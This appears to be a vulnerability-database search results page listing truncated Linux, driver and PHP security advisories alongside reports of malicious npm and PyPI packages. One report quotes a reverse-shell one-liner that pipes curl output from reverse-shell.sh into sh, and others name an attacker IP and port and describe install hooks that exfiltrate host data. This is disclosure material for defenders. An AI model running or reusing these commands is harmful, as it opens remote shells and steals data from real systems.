9548 matches found
SUSE SLES15 Security Update : distribution (SUSE-SU-2026:2032-1)
The remote SUSE Linux SLES15 / SLESSAP15 host has a package installed that is affected by a vulnerability as referenced in the SUSE-SU-2026:2032-1 advisory. This update for distribution rebuilds it against the current go security release. Tenable has extracted the preceding description block...
Malicious code in cch-agent (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cba1bd1e6bb56f0c9816ab482e2ee7cc3a8f04d9e253dd3afa67e4c71b3ae3a2 simpleagent/init.py re-exports ask and chat from simpleagent/client.py. Both entry points ignore caller-supplied configuration and route the caller's...
Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...
Fedora 44 : kernel (2026-66bba52149)
The remote Fedora 44 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2026-66bba52149 advisory. The 7.0.9-105/205 stable kernel updates contain a couple if important security fixes. Tenable has extracted the preceding description block directly from the...
NVIDIA Windows GPU Display Driver (May 2026)
A display driver installed on the remote Windows host is affected by multiple vulnerabilities: - A vulnerability exists in the kernel mode layer, where an attacker could leverage improper access to GPU resources, potentially leading to code execution, denial of service, escalation of privileges,...
RockyLinux 9 : nginx (RLSA-2026:18029)
The remote RockyLinux 9 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2026:18029 advisory. nginx: NGINX: Arbitrary Code Execution Vulnerability CVE-2026-42945 Tenable has extracted the preceding description block directly from the RockyLinux security...
Astra Linux – Vulnerability in Ansible
A flaw was discovered in the solariszone module from the Ansible Community modules. When setting the name of the zone on the Solaris host, the zone name is checked by listing the process with the ‘ps’ command on the remote machine. An attacker could exploit this flaw by creating a malicious zone...
Malicious code in customerdigital-ui-containers-lib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a314a5b253dcb30b2781bda216266b7ab1b49b62eec416bd9be07b48ab46a348 On npm install, postinstall.js collects git identity, OS user/uid, hostname, internal network interface addresses, Cloudflare Pages environment...
Ubuntu 16.04 LTS : Smarty vulnerability (USN-8272-1)
The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-8272-1 advisory. Takuya Aramaki discovered that Smarty did not properly escape JavaScript code. An attacker could possibly use this issue to conduct a cross-site scripting attack...
MAL-2026-3752 Malicious code in cdp-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dbf55b093e3a93e8d3f536101e62e09cf7e86636cd42813d02f518138cbcb8ed The package ships cdpinject.js, which combines childprocess, fs, http/https, and base64 encoding to gather system information and exfiltrate it over...
MAL-2026-3771 Malicious code in request-logger-canary (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cf0d566d7abb400988aea74b00099a6db4c5ea928f32e7d44648193e21a36035 [email protected] ships a preinstall.js that, when npm install runs, opens a TCP socket to 52.74.242.200:8851 and pipes an interactive...
RHEL 10 : osbuild-composer (RHSA-2026:17686)
The remote Redhat Enterprise Linux 10 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2026:17686 advisory. A service for building customized OS artifacts, such as VM images and OSTree commits, that uses osbuild under the hood. Besides building images for...
Malicious code in @gusmano/reext (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 498a21b60dcdfe236ea0b1683e1ec64aa091643b6ad562c3845757eed79660d8 The npm preinstall lifecycle script dist/scripts/preinstall.js, wired via package.json "preinstall": "node./dist/scripts/preinstall.js" reads the...
MAL-2026-3694 Malicious code in mymaldependency (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 38372ffa2ec19cee68f769508d95ffb4f5c1878aeae058ce3e7a33b947d06cf1 MyMalDependencypackage/init.py executes on every import: it calls os.uname and os.getcwd, writes the results to./trans.txt in the installer's working...
Electerm 参数注入漏洞
Electerm is a SSH/SFTP client developed by ZXDong262 from China, based on Electron. Versions of Electerm 3.8.15 and earlier have a parameter injection vulnerability. This vulnerability arises from the fact that the terminal hyperlink processor does not validate URLs with respect to protocols. Thi...
PHP 8.2.x < 8.2.31 Multiple Vulnerabilities
The version of PHP installed on the remote host is prior to 8.2.31. It is, therefore, affected by multiple vulnerabilities as referenced in the Version 8.2.31 advisory. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number...
Fedora 43 : squid (2026-e6a4814a4d)
The remote Fedora 43 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2026-e6a4814a4d advisory. - new version 7.5 - security update Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Ness...
RHCOS 3 : OpenShift Container Platform 3.2 (RHSA-2018:1241)
The remote Red Hat Enterprise Linux CoreOS 3 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2018:1241 advisory. - source-to-image: Improper path sanitization in ExtractTarStreamFromTarReader in tar/tar.go CVE-2018-1102 Note that Nessus has not tested fo...
RHCOS 3 : OpenShift Container Platform 3.10 (RHSA-2018:3549)
The remote Red Hat Enterprise Linux CoreOS 3 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2018:3549 advisory. - kubernetes: authentication/authorization bypass in the handling of non-101 responses CVE-2018-1002105 Note that Nessus has not tested for...
RHCOS 4 : Red Hat build of MicroShift 4.15.12 (RHSA-2024:2667)
The remote Red Hat Enterprise Linux CoreOS 4 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2024:2667 advisory. - golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS CVE-2023-45288 Note that Nessus has not tested for this...